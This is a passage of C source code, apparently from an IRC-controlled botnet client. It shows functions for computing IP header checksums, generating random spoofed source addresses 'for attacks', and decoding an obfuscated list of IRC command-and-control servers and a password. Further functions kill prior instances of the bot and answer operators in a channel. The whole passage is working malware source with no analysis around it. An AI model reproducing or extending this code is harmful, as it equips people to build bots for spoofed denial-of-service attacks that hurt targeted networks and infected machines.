| close(gfd->sockfd); 132 | free(gfd); 133 | return EXIT_FAILURE; 134 | } 135 | 136 | send(gfd->sockfd, IPREQUEST, strlen(IPREQUEST), 0); 137 | memset(temp, 0, sizeof temp); 138 | recv(gfd->sockfd, temp, sizeof(temp)-1, 0); 139 | 140 | x = 0; 141 | tok = strtok(temp, "\n\n"); 142 | 143 | while (tok != NULL) { 144 | if (x == 10) { 145 | sscanf(tok, "%d.%d.%*s.%*s", &a,&b); 146 | snprintf(req->rcv_sb, 4, "%d", a); 147 | snprintf(req->rcv_sc, 4, "%d", b); 148 | 149 | if (a > 255 || b > 255) return EXIT_FAILURE; 150 | 151 | close(gfd->sockfd); 152 | free(gfd); 153 | return EXIT_SUCCESS; 154 | } 155 | 156 | x++; 157 | tok = strtok(NULL, "\n"); 158 | } 159 | 160 | close(gfd->sockfd); 161 | free(gfd); 162 | 163 | return EXIT_FAILURE; 164 | } 165 | 166 | /* in_cksum(unsigned short *, int) */ 167 | /* create a checksum for ipheader. */ 168 | /* i've found that function with google. */ 169 | unsigned short in_cksum(unsigned short *ptr, int nbytes) { 170 | register long sum; 171 | u_short oddbyte; 172 | register u_short answer; 173 | 174 | sum = 0; 175 | 176 | while (nbytes > 1) { 177 | sum += *ptr++; 178 | nbytes -= 2; 179 | } 180 | 181 | if (nbytes == 1) { 182 | oddbyte = 0; 183 | *((u_char *) & oddbyte) = *(u_char *) ptr; 184 | sum += oddbyte; 185 | } 186 | 187 | sum = (sum >> 16) + (sum & 0xffff); 188 | sum += (sum >> 16); 189 | answer = ~sum; 190 | 191 | return answer; 192 | } 193 | 194 | /* host2ip(char *) */ 195 | /* convert hostname to ip address. */ 196 | /* i've found that function with google. */ 197 | unsigned int host2ip(char *hostname) { 198 | 199 | static struct in_addr i; 200 | struct hostent *h; 201 | 202 | i.s_addr = inet_addr((const char *)hostname); 203 | 204 | if (i.s_addr == -1) { 205 | h = gethostbyname(hostname); 206 | 207 | if (h == NULL) exit(0); 208 | 209 | bcopy(h->h_addr, (char *)&i.s_addr, h->h_length); 210 | } 211 | 212 | return i.s_addr; 213 | } 214 | 215 | /* parse_input_errors(sock_t *, requests_t *) */ 216 | /* check for input errors. */ 217 | int parse_input_errors(sock_t *sp, requests_t *req, 218 | unsigned short argn, unsigned short et) { 219 | int x = 0, y = 0; 220 | char error_tags[3][32] = { 221 | { 'a', 'b', 'c', 'd', 'e', 'f', 222 | 'g', 'h', 'i', 'l', 'm', 'n', 223 | 'o', 'p', 'q', 'r', 's', 't', 224 | 'u', 'v', 'z', 'y', 'w', 'k', 225 | 'x', 'j', '!', '?', ',', 0 }, 226 | { '.', ',', '?', '!', 0 } 227 | }; 228 | 229 | while (error_tags[et][x] != 0) { 230 | if (strchr(req->rcv_sb, error_tags[et][x])) y++; 231 | if (argn == 2 || argn == 3 || argn == 4) { 232 | if (strchr(req->rcv_sc, error_tags[et][x])) y++; 233 | } 234 | 235 | if (argn == 3 || argn == 4) { 236 | if (strchr(req->rcv_sd, error_tags[et][x])) y++; 237 | } 238 | 239 | if (argn == 4) { 240 | if (strchr(req->rcv_se, error_tags[et][x])) y++; 241 | } 242 | 243 | if (y > 0) { 244 | sockwrite(sp->sockfd, "PRIVMSG %s :[error] one error in your input data, see help!\n", channel); 245 | return EXIT_FAILURE; 246 | } 247 | 248 | x++; 249 | } 250 | 251 | return EXIT_SUCCESS; 252 | } 253 | 254 | /* create_irc_servlist() */ 255 | /* create a irc servers list. */ 256 | void create_irc_servlist() { 257 | unsigned short x = 0; 258 | char s_copy[512], *token; 259 | 260 | memset(s_copy, 0, sizeof s_copy); 261 | if (encirc != 0) { 262 | decode(enc_servers, 0); 263 | strncpy(s_copy, decodedsrv, sizeof(s_copy)); 264 | } 265 | else { 266 | strncpy(s_copy, irc_servers, sizeof(s_copy)); 267 | } 268 | 269 | token = strtok(s_copy, "|"); 270 | 271 | while (token != NULL) { 272 | if (x <= 10) { 273 | strncpy(isrv[x], token, 31); 274 | x++; 275 | } 276 | 277 | token = strtok(NULL, "|"); 278 | } 279 | 280 | total = x-2; 281 | return; 282 | } 283 | 284 | /* get_spoofed_addr() */ 285 | /* return a spoofed address for attacks. */ 286 | unsigned int get_spoofed() { 287 | char spa[21]; 288 | int a, b, c, d; 289 | 290 | srand(time(0)); 291 | 292 | random_ct = rand(); 293 | random_num = ((random_ct % 254) + 1); 294 | a = random_num; 295 | 296 | random_ct = rand(); 297 | random_num = ((random_ct % 254) + 1); 298 | b = random_num; 299 | 300 | random_ct = rand(); 301 | random_num = ((random_ct % 254) + 1); 302 | c = random_num; 303 | 304 | random_ct = rand(); 305 | random_num = ((random_ct % 254) + 1); 306 | d = random_num; 307 | 308 | snprintf(spa, sizeof(spa), "%d.%d.%d.%d", a, b, c, d); 309 | 310 | return ((unsigned int)host2ip(spa)); 311 | } 312 | 313 | /* pidprocess() */ 314 | /* check for clones */ 315 | void pidprocess() { 316 | FILE *pidfd; 317 | unsigned int pidc; 318 | 319 | if (!access(pidfile, F_OK) && !access(pidfile, R_OK)) { 320 | if ((pidfd = fopen(pidfile, "r+")) != NULL) { 321 | fscanf(pidfd, "%d", &pidc); 322 | fclose(pidfd); 323 | kill(pidc, SIGKILL); 324 | remove(pidfile); 325 | } 326 | } 327 | 328 | if ((pidfd = fopen(pidfile, "a+")) != NULL) { 329 | fprintf(pidfd, "%d", getpid()); 330 | fclose(pidfd); 331 | } 332 | 333 | return; 334 | } 335 | 336 | /* decode() */ 337 | /* a function to decode irc servers */ 338 | /* encoded by ircencode.c tool */ 339 | void decode(char *str, int dtype) { 340 | char decoded[512]; 341 | int x = 0, i = 0, c; 342 | 343 | char encodes[] = { 344 | '<', '>', '@', '_', ';', ':', ',', '.', '-', '+', '*', '^', '?', '=', ')', '(', 345 | '|', 'A', 'B', '&', '%', '$', 'D', '"', '!', 'w', 'k', 'y', 'x', 'z', 'v', 'u', 346 | 't', 's', 'r', 'q', 'p', 'o', 'n', 'm', 'l', 'i', 'h', 'g', 'f', 'e', 'd', 'c', 347 | 'b', 'a', '~', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'F', 'U', 'C', 'K' 348 | }; 349 | 350 | char decodes[] = { 351 | '0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'a', 'b', 'c', 'd', 'e', 'f', 352 | 'g', 'h', 'i', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'z', 'y', 353 | 'w', 'k', 'x', 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'L', 'M', 'N', 'O', 354 | 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'Z', 'Y', 'W', 'K', 'X', '|', ':', '.', '*' 355 | }; 356 | 357 | memset(decoded, 0, sizeof(decoded)); 358 | 359 | while (x < strlen(str)) { 360 | for (c = 0; c <= sizeof(encodes); c++) { 361 | if (str[x] == encodes[c]) { 362 | if (!dtype) decodedsrv[i] = decodes[c]; 363 | else decodedpsw[i] = decodes[c]; 364 | 365 | i++; 366 | } 367 | } 368 | 369 | x++; 370 | } 371 | 372 | return; 373 | } 374 | --------------------------------------------------------------------------------